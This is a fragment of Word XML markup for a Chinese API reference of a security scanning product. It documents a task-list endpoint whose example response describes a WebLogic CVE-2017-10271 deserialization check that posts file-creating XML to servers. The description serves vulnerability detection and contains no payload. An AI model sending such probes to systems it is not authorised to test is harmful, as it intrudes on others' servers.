      <w:tr w:rsidR="00BC669E" w14:paraId="6B1B3E14" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59537D2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F639FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F2974B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446E3B4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/task/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="53E62874"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osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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ErrorTok"/>
        </w:rPr>
        <w:t>//1：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>2：windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"ids"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"categories"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"安全检测"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"应急响应"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>updatedTimeRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-21 16:39:59"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-28 16:39:59"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAAD36A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D6B38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"rows"</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0478ee5024763edc6d3c"</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Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; 10.3.6 '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>wls-wsat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>XMLDecoder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 反序列化漏洞(CVE-2017-10271)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"description"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"漏洞描述： WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>的WLS Security组件对外提供webservice服务，其中使用了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>XMLDecoder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。 检测过程： 1.首先获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>的kb,进行遍历，获取其中的servers字段后，再进行一次遍历一遍获取服务器监听的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>和端口信息，将每一个server组合成一个新的数组 2.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>遍历每</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>一个server，获取其中的proto(协议类型)、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>、port,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>其中先</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>地址进行处理(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.3.4后为ipv6地址)，然后组合成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>,并往</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>发送xml数据。根据当前时间戳生成一个文件名，xml数据的作用则是创建该文件。 3.遍历根据时间戳生成的文件名数组,判断其是否存在。如果文件存在，则上报存在漏洞。否则上报不存在漏洞 使用场景： 可通过该脚本进行快速识别哪些主机上存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>服务然后判断是否存在反序列化漏洞，并将存在漏洞的主机上报。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"category"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"安全检测"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>riskInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"注意： 漏洞检测结果基于已有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> KB数据进行漏洞存在性判断，若您在是在刚刚修复完成漏洞后进行检测，则需要先更新数据依赖后再执行该检测脚本获取最新漏洞检测结果。"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>updatedTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-05-30 09:42:42"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"total"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186F16D"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484"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="02D89B7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0E8B145" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E599A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68438F2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32E74841" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD0460C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="331C07D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5565868A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1ABEB3E4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCBC392" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D1AAFB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43D34303" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速任务名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="72801799" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2107F797" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B21374" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FA11A70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D9049EF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37162B6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="688C4B76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6937D26B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务概述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5FCE2331" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4371215A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>riskInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66195721" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75307A3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6188EF3E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0228EF16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
